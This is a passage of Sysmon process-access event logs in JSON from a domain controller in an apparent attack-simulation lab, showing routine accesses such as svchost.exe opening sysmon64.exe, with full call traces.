07:56:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3937,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:07.919\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:07.919","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3938,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:07.919\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:07.919","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3939,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:07.919\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:07.919","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3940,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:07.919\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:07.919","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3941,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:07.919\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:07.919","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3942,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:07.919\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:07.919","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3943,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:07.919\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:07.919","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3944,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:07.919\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2017-5F25-0000-0010F1E60500}\r\nTargetProcessId: 4896\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:07.919","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2017-5F25-0000-0010F1E60500}","TargetProcessId":"4896","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:56:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3945,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:07.919\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nSourceProcessId: 1140\r\nSourceThreadId: 1976\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2017-5F25-0000-0010F6E60500}\r\nTargetProcessId: 924\r\nTargetImage: C:\\Windows\\system32\\usoclient.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 